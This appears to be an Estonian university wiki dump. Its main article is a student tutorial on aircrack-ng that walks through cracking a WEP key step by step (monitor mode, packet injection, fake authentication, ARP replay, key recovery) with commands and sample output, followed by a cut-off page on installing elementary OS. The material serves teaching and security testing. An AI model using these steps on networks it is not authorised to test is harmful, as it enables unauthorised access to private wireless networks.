Käesoleva artikli eesmärgiks on tutvustada Aircrack-ng komplekti (sisaldab üle kümne väiksema tööriista) kuuluvat tööriista aircrack-ng. Artikkel hõlmab endas aircrack-ng installatsiooni- ja kasutusjuhendit. &lt;br /&gt;
&lt;br /&gt;
=Eeldused=&lt;br /&gt;
&lt;br /&gt;
* Elementaarne käsurea kasutamisoskus&lt;br /&gt;
* Teadmised WiFi, WEP, WPA/WPA2 kohta&lt;br /&gt;
* Võrgus vähemalt 1 aktiivne klient&lt;br /&gt;
* Ollakse füüsiliselt piisavalt lähedal pääsupunktile (ingl. k Access Point)&lt;br /&gt;
* Soovituslik on toimetada mõne Linuxi distributsiooni peal (ehkki aircrack-ng on konfigureeritav erinevatel platvormidel, ei pruugi kõik funktsionaalsused mitte Linux süsteemidel töötada)&lt;br /&gt;
* aircrack-ng tööle saamise eelduseks on “heaks kiidetud” WiFi adapter (rohkem infot: [http://aircrack-ng.org/doku.php?id=compatible_cards siit] ja [http://aircrack-ng.org/doku.php?id=compatibility_drivers siit])&lt;br /&gt;
&lt;br /&gt;
WiFi adapteri vaatamine:&lt;br /&gt;
&amp;lt;pre&amp;gt;lspci -nn | grep Network&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
või rohkema informatsiooni saamiseks:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;lshw -class network&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Tulemuseks saame midagi sarnast:&lt;br /&gt;
&amp;lt;pre&amp;gt;02:00.0 Network controller [0280]: Intel Corporation Centrino Advanced-N 6205 [Taylor Peak] [8086:0082] (rev 34)&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
või &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;*-network&lt;br /&gt;
       description: Wireless interface&lt;br /&gt;
       product: Centrino Advanced-N 6205 [Taylor Peak]&lt;br /&gt;
       vendor: Intel Corporation&lt;br /&gt;
       physical id: 0&lt;br /&gt;
       bus info: pci@0000:02:00.0&lt;br /&gt;
       logical name: wlan0&lt;br /&gt;
       version: 34&lt;br /&gt;
       serial: 6c:88:14:1d:29:c4&lt;br /&gt;
       width: 64 bits&lt;br /&gt;
       clock: 33MHz&lt;br /&gt;
       capabilities: pm msi pciexpress bus_master cap_list ethernet physical wireless&lt;br /&gt;
       configuration: broadcast=yes driver=iwlwifi driverversion=3.19.0-18-generic firmware=18.168.6.1 ip=192.168.1.93 latency=0 link=yes multicast=yes wireless=IEEE 802.11abgn&lt;br /&gt;
       resources: irq:32 memory:f7d00000-f7d01fff&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;&amp;lt;!-- Warning style viksitud ArchWikist --&amp;gt;div style=&amp;quot;padding: 5px; margin: 0.50em 0; background-color: #FFDDDD; border: thin solid #DDBBBB; overflow: hidden;&amp;quot;&amp;gt;&#039;&#039;&#039;Pane tähele! &#039;&#039;&#039;Antud juhend on koostatud kasutades Ubuntu 15.04 (Vivid Vervet) ja Aircrack-ng 1.2 RC2 versioone. &amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=Üldkirjeldus=&lt;br /&gt;
&lt;br /&gt;
aircrack-ng on 802.11 WEP ja WPA/WPA2-PSK võtmete lahtimurdmise programm. Seda tuleb kasutada kombineerides ka teisi Aircrack-ng komplekti kuuluvaid mooduleid/tööriistu:&lt;br /&gt;
* airodump-ng - programm pakettide püüdmiseks &lt;br /&gt;
* aireplay-ng - programm pakettide „süstimiseks“ &lt;br /&gt;
* aircrack-ng - staatiline WEP ja WPA/WPA2-PSK võtmete lahti murdija&lt;br /&gt;
* airdecap-ng - WEP/WPA/WPA2 püütud failide dekrüpteerimiseks &lt;br /&gt;
&lt;br /&gt;
==Süntaks==&lt;br /&gt;
&lt;br /&gt;
aircrack-ng süntaks näeb välja järgmine:&lt;br /&gt;
&amp;lt;pre&amp;gt;aircrack-ng [võti] &amp;lt;püütud fail(id)&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nimekirja võtmetele leiab [http://www.aircrack-ng.org/doku.php?id=aircrack-ng&amp;amp;DokuWiki=10da6035d1e79b0fb572490ff22d4b53#usage SIIT!]&lt;br /&gt;
&lt;br /&gt;
=Installeerimine=&lt;br /&gt;
&lt;br /&gt;
Uuendame repositooriumi:&lt;br /&gt;
&amp;lt;pre&amp;gt;sudo apt-get update&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Kasutame apt-i utiliiti, et paigaldada Aircrack-ng komplekt:&lt;br /&gt;
&amp;lt;pre&amp;gt;sudo apt-get install aircrack-ng&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=Näide WEP kräkkimise protsessist=&lt;br /&gt;
&lt;br /&gt;
Alustuseks on soovitav üles märkida järgmised andmed, sest neid läheb meil ka edaspidi vaja: &lt;br /&gt;
* Arvuti MAC aadress, mis jooksutab aircrack-ng&#039;d: 00:0F:B5:88:AC:82&lt;br /&gt;
* BSSID (pääsupunkti MAC aadress): 00:14:6C:7E:40:80&lt;br /&gt;
* ESSID (võrgu nimi): teddy&lt;br /&gt;
* Pääsupunkti kanal: 9&lt;br /&gt;
* Raadiovõrgu liides (ingl. k Wireless interface): ath0&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Eesmärgiks on püüda kinni võimalikult palju initsialiseerimise vektoreid ehk IV-sid (ingl. k initialization vectors). Normaalse võrguliikluse (ingl. k network traffic) juures ei genereerita neid tavaliselt just väga kiiresti. Kuna keegi ei suuda meist aga pikalt kannatlik olla, siis kasutatakse siinkohal protsessi kiirendamiseks „süstimise“ (ingl. k injection) tehnikat. Sellisel juhul saadab pääsupunkt valitud pakette massiliselt uuesti ja uuesti, et oleks võimalik kinni püüda palju IV-sid võimalikult lühikese aja jooksul. Kui ka see on õnnestunud, siis saame kogutud IV-sid kasutada WEP võtme lahti murdmiseks.&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Lühidalt sammudest, mida tegema asume:&amp;lt;br&amp;gt;&lt;br /&gt;
1. Seadistame ennast kindlale pääsupunkti kanalile kuulamisrežiimi (ingl. k monitor mode)&amp;lt;br&amp;gt;&lt;br /&gt;
2. Testime „süstimise“ suutlikkust pääsupunktile &amp;lt;br&amp;gt;&lt;br /&gt;
3. Panna tööle airodump-ng pääsupunkti kanalil koos BSSID filtriga, et koguda IV-sid&amp;lt;br&amp;gt;&lt;br /&gt;
4. Kasutame aireplay-ng&#039;d vale autentimise läbiviimiseks pääsupunktiga &amp;lt;br&amp;gt;&lt;br /&gt;
5. Panna tööle aireplay-ng ARP päringute (ingl. k request) kordusrežiimis (ingl. k replay mode), et “süstida” pakette&amp;lt;br&amp;gt;&lt;br /&gt;
6. Kasutada aircrack-ng&#039;d salasõna lahti murdmiseks, kasutades seejuures ära kogutud IV-sid&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Samm 1: Seadistame ennast kindlale pääsupunkti kanalile kuulamisrežiimi&#039;&#039;&#039;&lt;br /&gt;
Esmalt tuleb avada konsooli aken ning WiFi võrgukaart seadistada kuulamisrežiimi seisundisse. Selles režiimis kuulab kaart igat paketti (tavaliselt kuulab kaart vaid meile adresseeritud pakette). Igat paketti kuulates on võimalik valida välja mõned neist, et viia läbi „süstimine“.&lt;br /&gt;
 &lt;br /&gt;
Peata ath0 liidese:&lt;br /&gt;
&amp;lt;pre&amp;gt;airmon-ng stop ath0&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Tulemus:&lt;br /&gt;
&amp;lt;pre&amp;gt;Interface       Chipset         Driver&lt;br /&gt;
&lt;br /&gt;
wifi0           Atheros         madwifi-ng&lt;br /&gt;
ath0            Atheros         madwifi-ng VAP (parent: wifi0) (VAP destroyed)&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Kontrolli, kas kõik athX liidesed on ikka suletud:&lt;br /&gt;
&amp;lt;pre&amp;gt;iwconfig&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Tulemus:&lt;br /&gt;
&amp;lt;pre&amp;gt;lo        no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
eth0      no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
wifi0     no wireless extensions.&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Kui siiski vastusest tuli välja veel mõni athX liides, siis tuleb ka need ükshaaval &#039;&#039;&#039;airmon-ng stop athX&#039;&#039;&#039; käsuga sulgeda.&lt;br /&gt;
&lt;br /&gt;
Seadista võrgukaart 9-ndale kanalile kuulamisrežiimi:&lt;br /&gt;
&amp;lt;pre&amp;gt;airmon-ng start wifi0 9&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pane tähele! Eelmises käsus kasutasime “wifi0”-i varasemalt üles märgitud võrguliidese “ath0” asemel, seda seetõttu, et kasutuses on madwifi-ng draiver (nähtav airmon-ng stop ath0 käsu tulemuses). Juhul, kui kasutusel on mõni muu draiver, kasuta raaiovõrgu liidese nime, näiteks “wlan0” või “rausb0”.&lt;br /&gt;
&lt;br /&gt;
Tulemus: &lt;br /&gt;
&amp;lt;pre&amp;gt; Interface       Chipset         Driver&lt;br /&gt;
 &lt;br /&gt;
 wifi0           Atheros         madwifi-ng&lt;br /&gt;
 ath0            Atheros         madwifi-ng VAP (parent: wifi0) (monitor mode enabled)&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pane tähele! “ath0” liides on märgitud nüüd kuulamisrežiimi.&lt;br /&gt;
&lt;br /&gt;
Veendumaks, et liides on korrektselt üles seatud:&lt;br /&gt;
&amp;lt;pre&amp;gt;iwconfig&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Tulemus:&lt;br /&gt;
&amp;lt;pre&amp;gt;lo        no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
wifi0     no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
eth0      no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
ath0      IEEE 802.11g  ESSID:&amp;quot;&amp;quot;  Nickname:&amp;quot;&amp;quot;&lt;br /&gt;
       Mode:Monitor  Frequency:2.452 GHz  Access Point: 00:0F:B5:88:AC:82   &lt;br /&gt;
       Bit Rate:0 kb/s   Tx-Power:18 dBm   Sensitivity=0/3  &lt;br /&gt;
       Retry:off   RTS thr:off   Fragment thr:off&lt;br /&gt;
       Encryption key:off&lt;br /&gt;
       Power Management:off&lt;br /&gt;
       Link Quality=0/94  Signal level=-95 dBm  Noise level=-95 dBm&lt;br /&gt;
       Rx invalid nwid:0  Rx invalid crypt:0  Rx invalid frag:0&lt;br /&gt;
       Tx excessive retries:0  Invalid misc:0   Missed beacon:0&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Kontrolli: Mode = Monitor; 2.452GHz = Channel 9; aircrack-ng&#039;d jooksutava arvuti MAC, mis on nähtav vaid madwifi-ng draiverite puhul, muidu mitte!&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Samm 2: Testime „süstimise“ suutlikkust pääsupunktile&#039;&#039;&#039; &lt;br /&gt;
Selle sammu eesmärgiks on selgitada välja, kas ollakse piisavalt lähedal pääsupunktile, et sinna pakette „süstida“.&lt;br /&gt;
 &lt;br /&gt;
Sisesta käsureale:&lt;br /&gt;
&amp;lt;pre&amp;gt;aireplay-ng -9 -e teddy -a 00:14:6C:7E:40:80  ath0&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;Selgituseks:&lt;br /&gt;
-9 - “süstimise” test&lt;br /&gt;
-e teddy – raadiovõrgu nimi&lt;br /&gt;
-a 00:14:6C:7E:40:80 – pääsupunkti MAC aadress&lt;br /&gt;
ath0 – raadiovõrgu liides&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
Tulemus: &lt;br /&gt;
&amp;lt;pre&amp;gt;09:23:35  Waiting for beacon frame (BSSID: 00:14:6C:7E:40:80) on channel 9&lt;br /&gt;
09:23:35  Trying broadcast probe requests...&lt;br /&gt;
09:23:35  Injection is working!&lt;br /&gt;
09:23:37  Found 1 AP &lt;br /&gt;
&lt;br /&gt;
09:23:37  Trying directed probe requests...&lt;br /&gt;
09:23:37  00:14:6C:7E:40:80 - channel: 9 - &#039;teddy&#039;&lt;br /&gt;
09:23:39  Ping (min/avg/max): 1.827ms/68.145ms/111.610ms Power: 33.73&lt;br /&gt;
09:23:39  30/30: 100%&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pane tähele! Viimane rida on eriti tähtis! Ideaalis peaks tulemus olema 100% või mõni muu väga kõrge protsent. Kui protsent on madal, siis ollakse pääsupunktist kas liiga kaugel või sellele liigagi lähedal. 0% märgib “süstimise” mitte toimimist ning sellisel juhul tuleks paigata (ingl. k patch) või kasutada hoopis muid draivereid.  &lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Samm 3: Avada airodump-ng pakettide püüdmiseks&#039;&#039;&#039;&lt;br /&gt;
Ava uus konsooliaken ja sisesta: &lt;br /&gt;
&amp;lt;pre&amp;gt;airodump-ng -c 9 --bssid 00:14:6C:7E:40:80 -w output ath0&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;Selgituseks:&lt;br /&gt;
-c 9 – raadiovõrgu kanal&lt;br /&gt;
--bssid 00:14:6C:7E:40:80 – pääsupunkti MAC aadressi ees olev võti ütleb, et antud aadress ei ole seotud ühegi pääsupunktiga, vaid otsib üht, kuhu ühendud&lt;br /&gt;
-w output – võtmele järgneb faili nime prefiks, mis edaspidi sisaldab IV-sid&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
Hiljem, mil “süstimine” leiab aset, võib ekraanilt lugeda midagi sellist:&lt;br /&gt;
&amp;lt;pre&amp;gt;CH  9 ][ Elapsed: 8 mins ][ 2007-03-21 19:25 &lt;br /&gt;
                                                                                                              &lt;br /&gt;
 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB  ENC  CIPHER AUTH ESSID&lt;br /&gt;
                                                                                                            &lt;br /&gt;
 00:14:6C:7E:40:80   42 100     5240   178307  338   9  54  WEP  WEP         teddy                           &lt;br /&gt;
                                                                                                            &lt;br /&gt;
 BSSID              STATION            PWR  Lost  Packets  Probes                                             &lt;br /&gt;
                                                                                                            &lt;br /&gt;
 00:14:6C:7E:40:80  00:0F:B5:88:AC:82   42     0   183782  &amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Samm 4: Kasutame aireplay-ng&#039;d vale autentimise läbiviimiseks pääsupunktiga&#039;&#039;&#039; &lt;br /&gt;
Ava uus konsooliaken ja sisesta:&lt;br /&gt;
&amp;lt;pre&amp;gt;aireplay-ng -1 0 -e teddy -a 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 ath0&amp;lt;/pre&amp;gt;&lt;br /&gt;
&#039;&#039;&lt;br /&gt;
Selgitus:&lt;br /&gt;
-1 – võlts autentimine&lt;br /&gt;
0 – kordusühendus(t)e aeg sekundites&lt;br /&gt;
-h 00:0F:B5:88:AC:82 – meie võrgukaardi MAC aadress&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
Õnnestumise korral on tulemus: &lt;br /&gt;
&amp;lt;pre&amp;gt;18:18:20  Sending Authentication Request&lt;br /&gt;
18:18:20  Authentication successful&lt;br /&gt;
18:18:20  Sending Association Request&lt;br /&gt;
18:18:20  Association successful :-)&lt;br /&gt;
Ebaõnnestumise korral on tulemus: &lt;br /&gt;
8:28:02  Sending Authentication Request&lt;br /&gt;
18:28:02  Authentication successful&lt;br /&gt;
18:28:02  Sending Association Request&lt;br /&gt;
18:28:02  Association successful :-)&lt;br /&gt;
18:28:02  Got a deauthentication packet!&lt;br /&gt;
18:28:05  Sending Authentication Request&lt;br /&gt;
18:28:05  Authentication successful&lt;br /&gt;
18:28:05  Sending Association Request&lt;br /&gt;
18:28:10  Sending Authentication Request&lt;br /&gt;
18:28:10  Authentication successful&lt;br /&gt;
18:28:10  Sending Association Request&amp;lt;/pre&amp;gt;&lt;br /&gt;
&#039;&#039;&#039;&lt;br /&gt;
Samm 5: Ava aireplay-ng ARP päringute kordusrežiimis&#039;&#039;&#039; &lt;br /&gt;
Järgnevalt kasutatakse aireplay-ng’d meetodil, kus on võimalik kuulata ARP päringuid, et neid siis võrku tagasi „süstida“. &lt;br /&gt;
&lt;br /&gt;
Ava uus konsooliaken ja sisesta:&lt;br /&gt;
&amp;lt;pre&amp;gt;aireplay-ng -3 -b 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 ath0&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Tulemus: &lt;br /&gt;
&amp;lt;pre&amp;gt;Saving ARP requests in replay_arp-0321-191525.cap&lt;br /&gt;
You should also start airodump-ng to capture replies.&lt;br /&gt;
Read 629399 packets (got 316283 ARP requests), sent 210955 packets...&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Samm 6: Ava aircrack-ng salasõna lahti murdmiseks&#039;&#039;&#039;&lt;br /&gt;
Viimaks pannakse tööle aircrack-ng, et saada kätte salasõna kogutud IV-de põhjal. &lt;br /&gt;
&lt;br /&gt;
Ava uus konsooliaken: &lt;br /&gt;
&amp;lt;pre&amp;gt;aircrack-ng -b 00:14:6C:7E:40:80 output*.cap&amp;lt;/pre&amp;gt;&lt;br /&gt;
&#039;&#039;&lt;br /&gt;
Selgitus:&lt;br /&gt;
-b 00:14:6C:7E:40:80 – MAC aadress märgib pääsupunkti, mis meile huvi pakub&lt;br /&gt;
output*.cap – märgib kõiki faile, mis algavad sõnaga “output” ning lõppevad “.cap”&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
Tulemus:&lt;br /&gt;
&amp;lt;pre&amp;gt;                             [00:03:06] Tested 674449 keys (got 96610 IVs)&lt;br /&gt;
&lt;br /&gt;
KB    depth   byte(vote)&lt;br /&gt;
 0    0/  9   12(  15) F9(  15) 47(  12) F7(  12) FE(  12) 1B(   5) 77(   5) A5(   3) F6(   3) 03(   0) &lt;br /&gt;
 1    0/  8   34(  61) E8(  27) E0(  24) 06(  18) 3B(  16) 4E(  15) E1(  15) 2D(  13) 89(  12) E4(  12) &lt;br /&gt;
 2    0/  2   56(  87) A6(  63) 15(  17) 02(  15) 6B(  15) E0(  15) AB(  13) 0E(  10) 17(  10) 27(  10) &lt;br /&gt;
 3    1/  5   78(  43) 1A(  20) 9B(  20) 4B(  17) 4A(  16) 2B(  15) 4D(  15) 58(  15) 6A(  15) 7C(  15) &lt;br /&gt;
&lt;br /&gt;
                      KEY FOUND! [ 12:34:56:78:90 ] &lt;br /&gt;
     Probability: 100%&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=Kokkuvõte=&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=Kasutatud kirjandus=&lt;br /&gt;
&amp;lt;references/&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=Autor(id)=&lt;br /&gt;
&lt;br /&gt;
Kelly Tragel [ISa 21]&lt;br /&gt;
Viimati muudetud: 25.05.2015&lt;br /&gt;
&lt;br /&gt;
=Versioonide ajalugu=&lt;br /&gt;
&lt;br /&gt;
&amp;lt;table border=&amp;quot;1&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&lt;br /&gt;
&amp;lt;th&amp;gt; Kuupäev &amp;lt;/th&amp;gt;&lt;br /&gt;
&amp;lt;th&amp;gt; Versioon &amp;lt;/th&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt; 25.05.2015 &amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt; 1.0 &amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;  &amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;  &amp;lt;/td&amp;gt;         &lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;  &amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;  &amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&lt;br /&gt;
&amp;lt;/table&amp;gt;&lt;/div&gt;</summary>
		<author><name>Ktragel</name></author>
	</entry>
	<entry>
		<id>https://wiki.itcollege.ee/index.php?title=Aircrack&amp;diff=88637</id>
		<title>Aircrack</title>
		<link rel="alternate" type="text/html" href="https://wiki.itcollege.ee/index.php?title=Aircrack&amp;diff=88637"/>
		<updated>2015-05-18T08:21:19Z</updated>

		<summary type="html">&lt;p&gt;Ktragel: Created page with &amp;quot;Kelly Tragel A21&amp;quot;&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Kelly Tragel&lt;br /&gt;
A21&lt;/div&gt;</summary>
		<author><name>Ktragel</name></author>
	</entry>
	<entry>
		<id>https://wiki.itcollege.ee/index.php?title=Elementary_OS_paigaldamine&amp;diff=86367</id>
		<title>Elementary OS paigaldamine</title>
		<link rel="alternate" type="text/html" href="https://wiki.itcollege.ee/index.php?title=Elementary_OS_paigaldamine&amp;diff=86367"/>
		<updated>2015-01-15T12:31:05Z</updated>

		<summary type="html">&lt;p&gt;Ktragel: /* Kasutatud kirjandus */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[[Category: Operatsioonisüsteemide administreerimine ja sidumine]]&lt;br /&gt;
&lt;br /&gt;
==&#039;&#039;&#039;Mis on elementary OS? &#039;&#039;&#039;== &lt;br /&gt;
&lt;br /&gt;
[[File:Luna.png|thumb|right|350px|elementary OS &amp;quot;Luna&amp;quot;]] &lt;br /&gt;
&lt;br /&gt;
elementary OS (edaspidi eOS) on Ubuntul baseeruv Linuxi distributsioon. Selle peamine erinevus võrreldes Ubuntuga on, et kui viimane kasutab töölauakeskkonnana Unity-t, siis eOS-le on kirjutatud päris 0-st üles oma kasutajaliides- Pantheon. See on hästi lõimitud spetsiaalselt eOS-le  loodud rakendustega nagu Plank (kiirkäivitusriba), Midori (vaikimisi veebibrauser) ja Scratch (lihtne teksti redigeerimise tööriist). [1]&lt;br /&gt;
&lt;br /&gt;
==&#039;&#039;&#039;Visioon ja taust&#039;&#039;&#039;== &lt;br /&gt;
&lt;br /&gt;
Liikvel olevate eksiarvamuste tagasi lükkamiseks tuleb öelda, et eOS ei ole lihtsalt kamba arendajate poolt loodud kujundus, mida Ubuntu all nn programmi näol käivitada saaks. eOS sai küll alguse teemade ja rakenduste komplektist, mis olid algselt mõeldud Ubuntule, kuid ajaga kasvas sellest siiski välja täiesti uus distributsioon. Jäädes aga seejuures Ubuntu põhiseks, ühilduvad viimase repositooriumid ja paketid täielikult eOS-ga. [2]&lt;br /&gt;
&lt;br /&gt;
Kasutajaliides Pantheon on saanud oma praeguse kuju ajast, mil arendusmeeskond pärast Jupiteri välja laskmist leidis, et kasutajakogemuse parandamiseks tuleks töölaua keskkond uuel moel üles ehitada. GNOME-lt kisti küljest kõik, mida ei tahetud ega peetud vajalikuks ning vahetati välja uute, omalt poolt ehitatud asendustega. Pantheon-i eesmärgiks on seatud olla intuitsioonil põhinev (kergesti hoomatav ja käsitletav), mis ei ehmataks esimese hooga uut kasutajat ära, ega nõuaks ülearust “nuputamist”. [3]&lt;br /&gt;
&lt;br /&gt;
==&#039;&#039;&#039;Versioonid&#039;&#039;&#039;== &lt;br /&gt;
&lt;br /&gt;
Esimene stabiilne versioon eOS-st kandis nime Jupiter ning tuli välja 31. märtsil 2011. See baseerus Ubuntu 10.10 versioonil, kuid pärast 2012. aasta oktoobrit ei ole enam toestatud ega ka ametlikul kodulehel (http://elementaryos.org/) kättesaadav. [4][5]&lt;br /&gt;
&lt;br /&gt;
Teine versioon eOS-le avaldati 2012. aasta novembris, kuid sel puhul oli tegu beta versiooniga, mis kandis koodnimetust Luna. Luna põhineb Ubuntu 12.04 LTS versioonil. [6] Pea pool aastat hiljem, 6. mai 2013 tuli välja ka Luna teine beta versioon , mis parandas enam kui 300 tarkvaralist viga ning viis sisse ka mitmeid teisi muudatusi. Näiteks laiendas uus versioon regioonide valikut, juurde tuli mitme kuva toetus, sisse viidi visuaalseid täiustusi ning uuendati ühes rakendusi. [6][7] 7. augustil 2013 ilmus ametlikule koduleheküljele stardiloendur, mis lõppes 3 päeva hiljem, 10. augustil,  teise stabiilse versiooni väljalaskmisega. [8][1]&lt;br /&gt;
 &lt;br /&gt;
Kolmanda stabiilse versiooni nimi Isis, sai välja käidud veel sama aasta augustis projekti liidri Daniel Foré poolt. [9] Nimi muudeti hiljem Freya-ks, et vältida sarnasusseost militaristliku grupi ISIS-ega. [10] Esimene beta versioon Freya-st avaldati 11. augustil 2014. aastal ning see toetub Ubuntu 14.04 LTS versioonile. [9][11]&lt;br /&gt;
&lt;br /&gt;
==&#039;&#039;&#039;elementary OS paigaldamine&#039;&#039;&#039;== &lt;br /&gt;
&lt;br /&gt;
Miinimumnõuded arvutile [12]:&lt;br /&gt;
*	1 GHz x86 protsessor&lt;br /&gt;
*	512MB põhimälu (RAM) (soovituslik: 1GB)&lt;br /&gt;
*	5GB vaba kettaruumi (soovituslik: 15GB)&lt;br /&gt;
*	Graafikakaardi ja ekraani lahutusvõime 1024x768&lt;br /&gt;
*	CD/DVD-lugeja või USB-lt bootimise võimalus&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Tarkvara, mis ühes eOS Lunaga kaasa tuleb [12]:&lt;br /&gt;
*	File Roller: arhiivihaldur&lt;br /&gt;
*	Geary: E-posti klient&lt;br /&gt;
*	GNOME Calculator (ehk gcalctool): kalkulaator &lt;br /&gt;
*	Empathy: kiirsuhtlus- ja  Internetitelefoni (VoIP) klient&lt;br /&gt;
*	Maya: kalender&lt;br /&gt;
*	Midori: veebibrauser&lt;br /&gt;
*	Noise: audiomängija&lt;br /&gt;
*	Pantheon Files: failihaldur&lt;br /&gt;
*	Pantheon Terminal: terminaliemulaator&lt;br /&gt;
*	Scratch: tekstiredaktor&lt;br /&gt;
*	Screenshot: kuvatõmmiste tegemise tööriist&lt;br /&gt;
*	Shotwell: fotohaldur&lt;br /&gt;
*	Simple Scan: dokumentide skaneerimise tööriist&lt;br /&gt;
*	Switchboard System Settings: juhtpaneel (funktsioonilt sarnaneb Windowsi Control Panel-ile)&lt;br /&gt;
*	Totem: filmimängija&lt;br /&gt;
*	Ubuntu Software Center: tarkvarahaldur&lt;br /&gt;
*	Update manager: uuendushaldur&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
eOS on antud tasuta kasutusse, muidugi võimalusega vabatahtlikel arendusmeeskonda rahaliselt toetada. &lt;br /&gt;
Installatsiooni viisardiks on Ubiquity, mis on tuttav juba Ubuntust ja ühtlasi leiab kasutust ka temast “tuletatud” distributsioonidel. &lt;br /&gt;
(Kõik järgnevad installatsiooni pildid on võetud välisest allikast) [13]&lt;br /&gt;
&lt;br /&gt;
==== Samm 1: Loo Live USB või CD ====&lt;br /&gt;
&lt;br /&gt;
Esmalt tuleks luua Live CD/USB, millega saab eOS-i kas arvutisse installida või vajadusel ka kasutada otseselt ilma süsteemi paigaldamata. Kuidas seda teha, loe täpsemalt [http://www.ubuntu.com/download/desktop/ siit] või [http://elementaryos.org/docs/user-guide/creating-an-install-disk siit].&lt;br /&gt;
&lt;br /&gt;
==== Samm 2: Bootimine ====&lt;br /&gt;
&lt;br /&gt;
Ühenda Live USB või ketas seadmega ja taaskäivita arvuti. Hetkel, mil arvuti end üles bootib, vajuta F10 või F12, et jõuda boot menüüsse. Sealt tuleks valida vastavalt kas USB, CDROM, Removable Media või muud sarnast (rohkem abi [http://elementaryos.org/docs/user-guide/booting-the-install-disk siit]).&lt;br /&gt;
&lt;br /&gt;
==== Samm 3: Alusta paigaldamist ====&lt;br /&gt;
&lt;br /&gt;
Järgnevalt peaks ilmuma installatsiooni aken, kus tuleb ära märkida keel ning valida emma-kumma vahel, kas proovida või paigaldada eOS kohe arvutisse. &lt;br /&gt;
&lt;br /&gt;
[[File:In1.jpg|500px|Valik1]] &lt;br /&gt;
&lt;br /&gt;
Seejärel näidatakse, kas kõik (osa soovituslikke) nõuded on täidetud: vähemalt 4.3GB vaba kettaruumi, olemasolev ühendus vooluallikaga ja Internetiga. Lisaks on võimalus valida, kas installeerida uuendused ühes eOS-i enda paigaldamisega või, kas paigaldada ka ühes kolmandate osapoolte tarkvara. &lt;br /&gt;
&lt;br /&gt;
[[File:In2.jpg|500px|Valik2]]&lt;br /&gt;
&lt;br /&gt;
==== Samm 4: Partitsioonide loomine ====&lt;br /&gt;
&lt;br /&gt;
Tuleb langetada otsus, kas tühjendada kogu kõvaketas ja paigaldada sellele üksnes eOS või luua eOS-le uus partitsioon, et paigaldada see juba näiteks mõne muu olemasoleva operatsioonisüsteemi kõrvale. &lt;br /&gt;
&lt;br /&gt;
[[File:In4.jpg|500px|Valik3]]&lt;br /&gt;
&lt;br /&gt;
==== Samm 5: Loo root, swap ja home  ====&lt;br /&gt;
